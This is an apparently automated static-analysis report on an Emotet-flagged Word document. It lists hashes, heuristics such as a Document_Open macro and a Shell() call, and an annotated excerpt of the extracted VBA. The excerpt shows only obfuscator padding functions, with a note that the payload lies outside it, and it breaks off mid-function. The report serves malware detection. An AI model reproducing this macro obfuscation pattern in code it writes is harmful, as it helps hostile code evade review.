Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 4bb52ddb53632bbf…

MALICIOUS

Office (OLE)

169.0 KB Created: 2018-07-23 20:18:00 Authoring application: Microsoft Office Word First seen: 2019-04-17
MD5: 4182362f7a11d676573daec8d561e40f SHA-1: 0af9a481e2e4e67fa31fdda96458e006fc118f02 SHA-256: 4bb52ddb53632bbf53b14dafbf5c220145c352e0ba2deeeaa3983b5c8c9d0068
182 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The file was detected as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6877415-0', indicating it is likely an Emotet downloader. The presence of a 'Document_Open' macro (which runs automatically when the document is opened) and a 'Shell()' call (which launches an external process) within the VBA code strongly suggests that the macro is designed to execute arbitrary commands, typically to download and run a secondary payload. The VBA code itself is heavily obfuscated, making it difficult to determine the exact download URL or execution method without further dynamic analysis.

Heuristics 5

  • ClamAV: Doc.Downloader.Emotet-6877415-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6877415-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — a standard Office XML namespace identifier, not a download location

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 34939 bytes
SHA-256: 6a4b9ecbda03ee3194920923ab8f4f1c2529ae614234427affa23c3155fe0d94
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "aYGpPNl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module attributes as exported by olevba. VB_Base = "1Normal.ThisDocument"
' together with VB_PredeclaredId = True indicates this is the document's
' ThisDocument module, i.e. the module whose Document_Open event handler
' (flagged in the heuristics above) runs when the file is opened. The
' randomised VB_Name matches the identifier obfuscation used in the code below.
' Obfuscator padding, not payload logic. The function takes no arguments,
' never assigns its own name (so it returns Empty) and calls no other
' procedure; nothing it writes is read back. None of the identifiers it uses
' is declared with Dim anywhere in this excerpt and no Option Explicit is
' visible, so — assuming nothing else in the module assigns them — they all
' evaluate as Empty/0: each `Xor` test is False, each `Or <nonzero>` test is
' True, and every group collapses to a single CDbl assignment to an unused
' variable. On Error Resume Next would silently skip any statement that did
' fail (e.g. the `/ <Empty>` divisions in the first branches). Treat the
' function as a decoy; the Document_Open / Shell() behaviour noted in the
' report lives elsewhere in the module, outside this excerpt.
Private Function ojPGTtjaHCRQkL()
On Error Resume Next
   ' Six structurally identical groups follow; only names and literals differ.
   ' Note the indentation is misleading: each ElseIf belongs to the outer If.
   If dpKHq Xor OUAipc Then
      vhfiG = (73007 - IfJjX * 1860 + dbBskz - (37544 / tpdjM))
      ElseIf ctowtQ Or 76698 Then
      If SGPEPO And jajpEk Then
         wqEdCi = Hex(pFXZoj)
      End If
      Umdktl = CDbl(17914 - 88678)
   End If
   If YnmvD Xor SCVVsE Then
      lDAJsj = (41213 - izWrd * 16469 + apiBW - (60770 / dCSuq))
      ElseIf QINmQf Or 36781 Then
      If kIGYjV And nQEaqO Then
         jrriAk = Hex(wrztX)
      End If
      Wmjawp = CDbl(43881 - 82240)
   End If
   If rlzTrL Xor FmdVrB Then
      jIhiw = (89216 - Eapqh * 76360 + hVoIsL - (10842 / dwCdj))
      ElseIf UpXrZ Or 72517 Then
      If JiBMp And nLHdJ Then
         DYQpN = Hex(pQTiif)
      End If
      LEjkS = CDbl(98130 - 15791)
   End If
   If jEPMOt Xor Hsjuzs Then
      OFDcB = (85772 - aiMLoG * 9662 + zjEOY - (88630 / SbaLdS))
      ElseIf wrWuNV Or 75352 Then
      If jsjAIV And Banpv Then
         ApiUVQ = Hex(cBqPNi)
      End If
      VousjY = CDbl(35767 - 5995)
   End If
   If XlbPaA Xor nWEwB Then
      arEzEi = (4314 - nijhM * 62320 + FWZzcD - (93121 / pXBBRb))
      ElseIf ZqTAUA Or 58384 Then
      If NYKKk And siOTd Then
         zizYkd = Hex(PcCck)
      End If
      wEtOLM = CDbl(89448 - 53082)
   End If
   If YSsMd Xor pnhntr Then
      ruQqsO = (92318 - vZSnC * 97168 + CHjGB - (35664 / GrRdSn))
      ElseIf vwwFJ Or 4480 Then
      If uVBMC And ctaZb Then
         UkaEnp = Hex(QoZZOw)
      End If
      wAcTh = CDbl(85864 - 92695)
   End If
End Function
' Second block of obfuscator padding, built from the same template as the
' function above: no arguments, no return value assigned (returns Empty), no
' calls out, and every identifier used without a Dim in this excerpt. With
' those names unassigned they are Empty/0, so each `Xor` test is False, each
' `Or <nonzero>` test is True, and each group reduces to one CDbl assignment
' to a variable nothing reads. On Error Resume Next masks any runtime error
' a branch might raise. Not an indicator on its own; it exists to dilute the
' macro and frustrate static review.
Private Function WvnkAZYaw()
On Error Resume Next
   ' Indentation is misleading: each ElseIf belongs to the enclosing If.
   If ZPokv Xor HzHXw Then
      iiLqF = (32551 - iWLbF * 46459 + nARwj - (44234 / EpCiqR))
      ElseIf LcdLi Or 75412 Then
      If AYmYNO And wOniMc Then
         GhIoZU = Hex(tJMPz)
      End If
      WuhPX = CDbl(71047 - 52231)
   End If
   If LDwho Xor dZnlr Then
      nwQKVU = (38422 - bWjNmL * 15326 + PQWZZL - (68552 / rtjlzZ))
      ElseIf wdJhd Or 90536 Then
      If zwKka And WkucNC Then
         XPRSb = Hex(dSbki)
      End If
      CVikdi = CDbl(58444 - 61389)
   End If
   If wEmww Xor JrSLW Then
      uKtzMJ = (31034 - WRSLPK * 9672 + dXUjW - (41290 / QAXZv))
      ElseIf BrHAwt Or 51393 Then
      If aMQio And hmajnD Then
         OuqpbY = Hex(dwpjU)
      End If
      UZLLS = CDbl(33452 - 58279)
   End If
   If faVIOH Xor OviolF Then
      VXJSRH = (28994 - JNKKC * 62267 + LbBoi - (3659 / SQGSRu))
      ElseIf lKTRz Or 23839 Then
      If OSJjMG And IwDFv Then
         jCnwas = Hex(FsMzpU)
      End If
      YCqsC = CDbl(38435 - 60532)
   End If
   If sIRvR Xor SCMWE Then
      iXWrGZ = (75653 - GJqsw * 86585 + HKCbK - (74561 / uoIzWu))
      ElseIf JnTPap Or 59556 Then
      If Bwusa And iRZzY Then
         KrKvt = Hex(qciiJC)
      End If
      vwWXdY = CDbl(7266 - 50393)
   End If
   If GjSLp Xor Wjzwp Then
      RdXWf = (98481 - lTmrz * 60051 + MuvZU - (59363 / iDPaj))
      ElseIf QMzJE Or 4900 Then
      If ftzHtE And CpUoT Then
         jAcnad = Hex(tiZIv)
      End If
      wlYTcm = CDbl(94587 - 99310)
   End If
End Function
Private Function ioAGjIJFztiL()
On Error Resume Next
   If frLci Xor jvlEYM Then
      cTNtAX = (58786 - wqMjp * 32196 + oRaNFp - (65594 / XKjWw))
      ElseIf wNMUEm Or 16800 Then
      If jJirBh And zwtYk Then
         UdLHJ = Hex(IqiQBi)
      End If
      AcALki = CDbl(80840 - 79913)
   End If
   If VjJkZ Xor EMBHl Then
      Csdujp = (48424 - GYVQF * 97318 + JbljX - (28457 / JqcUKu))
      ElseIf onoMqW Or 92336 Then
      If SjJAiI And Ntfbzu Then
         PbNOCi = Hex(SMfikR)
      End If
      hDOcLd = CDbl(18539 - 3845)
   End If
   If hFEwOj Xor aIOjF Then
      CsifK = (77927 - NtCZA * 249 + iAWJw - (5951 / BDmiq))

... (truncated)